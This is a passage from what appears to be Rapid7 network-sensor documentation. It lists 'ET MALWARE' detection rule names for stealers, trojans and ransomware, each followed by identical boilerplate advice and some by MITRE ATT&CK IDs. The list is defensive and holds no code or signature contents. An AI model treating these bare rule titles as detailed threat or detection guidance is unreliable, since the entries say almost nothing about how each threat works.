Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Hancitor Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.HLLW.Autoruner USA_Load UA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Htbot.B Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/HydraCrypt CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/HydraCrypt CnC Beacon 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Hyteod CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/IcedID Requesting Encoded Binary M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/IcedID Requesting Encoded Binary M5

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/IcedID WebSocket Request M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Infostealer.Snifula File Upload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/InfoTester Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Injector.BXEW Variant HTTP CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Injector.BXEW Variant HTTP CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Injector.BXEW Variant HTTP CnC Beacon 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Injector.DSQR CnC Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Injector.ULH CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Ispen BADNEWS CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Ispen BADNEWS Fake User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Jackpot Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32.Jadtre Retrieving Cfg File

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/JSWORM Ransomware Style Geo IP Check M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/JSWORM Ransomware Style Geo IP Check M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Kaicone.A Checkin via HTTP POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Kazy Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Keatep.B Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kelihos.F Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kelihos.F exe Download 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Ketrican CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Koubbeh Sending Windows System Info

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WIN32/KOVTER.B Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kribat-A Downloader Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.BSYO Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.BSYO Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.FVVZ Variant CnC Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.HCZR Variant Initial Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.HMCH Dropper User-Agent M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.HMCH Dropper User-Agent M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.HMCH Dropper User-Agent M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.HMCH Dropper User-Agent M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.HNBU CryptoMiner - GetTasks Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.HNBU CryptoMiner - Report Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Krypton Stealer CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kuluoz.B Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Lager Trojan Initial Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Lager Trojan Reporting

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Lager Trojan Reporting (gcu)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Laturo Stealer CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Limbozar Ransomware Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/LNK/Agent.GX Javascript Downloader M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/LNK/Agent.GX Javascript Downloader M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/LockScreen.BW Payment Info

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/LockScreen.BW Payment Info 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/LockScreen CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/LockScreen CnC HTTP Pattern

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/LODEINFO CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/LODEINFO v0.3.5 CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/LODEINFO v0.3.6 CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/LODEINFO v0.4.x CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/MailerBot CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Malgent!MSR Dropper Requesting Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Malgent!MSR User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Matsnu.L Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Meredrop Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/MereTam.A Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/MereTam.A Ransomware CnC Init Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Mingloa CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Mole Ransomware CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/MOOZ.THCCABO CoinMiner CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Resource Hijacking - T1496

ET MALWARE Win32.MSUpdater C&C traffic GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Napolar.A Getting URL

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Necurs

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Necurs Common POST Header Structure

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Nemty Ransomware Style Geo IP Check M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Nemty Ransomware Style Geo IP Check M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Neshta.A Posting Data

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Neurevt.A/Betabot checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Neurevt.A/Betabot Check-in 4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Neutrino Bot Fake 404 Checkin Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Neutrino CC dump

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Neutrino Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Neutrino Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Neutrino Checkin 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Neutrino Checkin 6

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Neutrino ping

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/NitroStealer CnC Exfil M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/NitroStealer/exoStub CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Nivdort Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Nivdort Posting Data 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Nubjub.A HTTP Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Nuclear Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Oliga Fake User Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/OnLineGames GetMyIP Style Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Onliner CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Onliner Mailer Module Communicating with CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Onliner Receiving Commands from CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Onliner Requesting Additional Modules

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Pamesg/ArchSMS.HL CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.PEx.Delphi.1151005043 Post-infection Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Phorpiex CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pift Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pift Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PivNoxy CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PlagueBot User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Ponmocup.A Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Pony Variant FOX Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pottieq.A Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

